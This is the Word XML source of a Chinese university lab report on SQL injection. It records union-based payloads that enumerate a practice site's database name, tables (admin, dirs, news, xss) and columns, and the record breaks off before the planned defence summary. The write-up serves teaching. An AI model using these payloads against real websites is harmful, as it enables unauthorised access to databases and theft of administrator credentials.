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AB334E" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="0000000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《网络空间安全概论》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DC0470" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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9E5DAC" w14:paraId="6968394F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51A31301" w14:textId="77777777" w:rsidR="009E5DAC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781CF0CA" w14:textId="4F27E536" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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094E7703" w14:textId="77777777" w:rsidR="009E5DAC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22386ADC" w14:textId="27E8F71C" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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9E5DAC" w14:paraId="2CFC728F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5E6B7F2A" w14:textId="77777777" w:rsidR="009E5DAC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5CFA4493" w14:textId="48911AAA" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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08259ED6" w14:textId="77777777" w:rsidR="009E5DAC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264B2CA5" w14:textId="01B8C1A1" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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9E5DAC" w14:paraId="63061B80" w14:textId="7777777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6BC3AFC3" w14:textId="77777777" w:rsidR="009E5DAC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4D3AC78C" w14:textId="77777777" w:rsidR="009E5DAC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  <w:color w:val="FF0000"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实验四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 SQL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>注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="1FE088DA" w14:textId="77777777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7C59EEF0" w14:textId="77777777" w:rsidR="009E5DAC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1306D8B" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:right="-51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 xml:space="preserve"> 2025.05.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59E726D1" w14:textId="77777777" w:rsidR="009E5DAC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13C8F80B" w14:textId="77777777" w:rsidR="009E5DAC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DS1404</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="495968D5" w14:textId="7777777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03EED848" w14:textId="77777777" w:rsidR="009E5DAC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7CEC07C3" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC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 w:hint="eastAsia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05F2BA3B" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:leftChars="-20" w:left="-44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4BDF1C9C" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind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验证性</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">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设计性</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">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综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="066ABFD5" w14:textId="77777777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6179D42" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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52F89357" w14:textId="77777777" w:rsidR="009E5DAC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5"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK48"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK65"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK20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25394A72" w14:textId="77777777" w:rsidR="009E5DAC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21E9C917" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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20D42A62" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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9E5DAC" w14:paraId="109C76D6" w14:textId="77777777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84DF3C5" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:num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实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718D988A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1. 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学习并掌握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注入的基本原理和方法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6021ED60" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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2. 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学习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注入的防范措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="766ED49B" w14:textId="77777777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D87A5FD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37F7C83B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对以下网站进行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注入：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37C959CC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hyperlink r:id="rId7" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                  <w:bCs/>
                  <w:sz w:val="24"/>
                </w:rPr>
                <w:t>http://pu2lh35s.ia.aqlab.cn/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="4286C332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完成以下信息的获取：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46FB3812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数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA2DB63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数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38C73E6E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每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB2D727" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left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lastRenderedPageBreak/>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DF4E12A" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:b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最后总结如何对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注入攻击进行防范。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="72614B0C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4DF4209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color w:val="FF0000"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三、实验设计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53F51355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实验原理：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF38954" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/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任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E85978" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="14BD3779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实验步骤：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A05DF7E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检索SQL注入相关资料，自学SQL注入基本方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5BCA01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完成对特定网站的SQL注入以获取数据库信息</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E5DAC" w14:paraId="5DBACE22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988FE87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四、实验过程或算法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37993B90" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>检测网站是否存在SQL注入漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C8ED7D6" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/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进入网站 http://pu2lh35s.ia.aqlab.cn/，点击页面上的链接后可以跳转到 http://pu2lh35s.ia.aqlab.cn/?id=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>，我们添加=2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>检测网站是否存在SQL注入漏洞</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>，即</w:t>
            </w:r>
            <w:hyperlink r:id="rId8" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a7"/>
                  <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                  <w:bCs/>
                  <w:sz w:val="24"/>
                </w:rPr>
                <w:t>http://pu2lh35s.ia.aqlab.cn/?id=1</w:t>
              </w:r>
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a7"/>
                  <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                  <w:bCs/>
                  <w:sz w:val="24"/>
                </w:rPr>
                <w:t>=2，</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>发现页面异常，说明=2被直接拼接到SQL语句中，证明存在注入漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EFADC05" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/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原始页面如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D79D42" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/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114300" distR="114300" wp14:anchorId="5A900883" wp14:editId="62A37DBA">
                  <wp:extent cx="4251325" cy="2216150"/>
                  <wp:effectExtent l="0" t="0" r="635" b="8890"/>
                  <wp:docPr id="24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221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8C6F7" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/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添加=2后，出错，初步说明存在着注入漏洞：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B5D156" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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351B45A0" wp14:editId="724AEB08">
                  <wp:extent cx="5017135" cy="1788160"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
                  <wp:docPr id="23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135" cy="178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CC7C2" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF80616" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:firstLineChars="300" w:firstLine="720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?id=1=2 union select 1,database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790E6510" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="560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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746876212537.png"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3F277EED" wp14:editId="693D2F06">
                  <wp:extent cx="4371340" cy="1577975"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
                  <wp:docPr id="2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340" cy="157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3848064E" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E26C2F7" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:leftChars="327" w:left="719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?id=1=2 UNION SELECT 1,GROUP_CONCAT(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)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information_schema.tables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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70125565" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="560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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746876122423.png"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6B41ECB7" wp14:editId="5B232C21">
                  <wp:extent cx="4737735" cy="2329180"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
                  <wp:docPr id="16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735" cy="232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0A62F177" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10D619C1" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr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kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">admin </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A6CB72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查询字段数量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32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1,COUNT(*)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='admin'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=database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D78F16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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746876928284.png"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6F60CD5F" wp14:editId="6FB3981D">
                  <wp:extent cx="4726305" cy="1917065"/>
                  <wp:effectExtent l="0" t="0" r="13335" b="3175"/>
                  <wp:docPr id="15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305" cy="191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7D98FB15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分别构造字段，查询admin表中的内容 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70E553E4" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr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='admin' limit 0,1</w:t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57DF923C" wp14:editId="36F9F1D2">
                  <wp:extent cx="5271770" cy="1786255"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="12065"/>
                  <wp:docPr id="13" name="图片 4" descr="a02c292de8d75e3c1749aebe03bc4d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 descr="a02c292de8d75e3c1749aebe03bc4dc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78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lastRenderedPageBreak/>
              <w:br/>
              <w:t xml:space="preserve">?id=1=2 union select 1,column_name from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='admin' limit 1,1</w:t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2DBEDFF4" wp14:editId="0EA2653E">
                  <wp:extent cx="5268595" cy="1838960"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="5080"/>
                  <wp:docPr id="4" name="图片 5" descr="0f354349d9f3641dde1d3dcab4af48c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5" descr="0f354349d9f3641dde1d3dcab4af48c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='admin' limit 2,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0712A796" wp14:editId="71B3D179">
                  <wp:extent cx="5264150" cy="1898015"/>
                  <wp:effectExtent l="0" t="0" r="8890" b="6985"/>
                  <wp:docPr id="22" name="图片 6" descr="f9e22dede0f560786893ce3e4a19ebc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 descr="f9e22dede0f560786893ce3e4a19ebcb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D052C8" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>(2)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>dirs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B048D5C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查询字段数量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32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1,COUNT(*)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dirs'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=database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AFDFEE" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877020335.png"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1A7800B3" wp14:editId="08BFA2AE">
                  <wp:extent cx="5212715" cy="1913890"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
                  <wp:docPr id="14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715" cy="191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6E2EA1AC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分别构造字段，查询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dirs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表中的内容 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFD3920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dirs'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limit 0,1</w:t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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746876609419.png"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3AD0A3E9" wp14:editId="712CEC0C">
                  <wp:extent cx="5055235" cy="2188845"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="5715"/>
                  <wp:docPr id="19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235" cy="218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46853AFE" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">news </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00350F39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查询字段数量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32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1,COUNT(*)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='news'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=database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E95B53B" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877102144.png"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6368705C" wp14:editId="38AB57C2">
                  <wp:extent cx="5115560" cy="1285875"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="9525"/>
                  <wp:docPr id="11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205662C4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分别构造字段，查询news表中的内容 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D17C23E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='news' limit 0,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038383B1" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="both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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877127222.png"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20527B41" wp14:editId="174F34EC">
                  <wp:extent cx="5265420" cy="1503045"/>
                  <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
                  <wp:docPr id="3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0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='news' limit 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="675FD57F" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877160135.png"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54AE0013" wp14:editId="3245B78A">
                  <wp:extent cx="5170170" cy="1503680"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="5080"/>
                  <wp:docPr id="8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628E4BD1" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
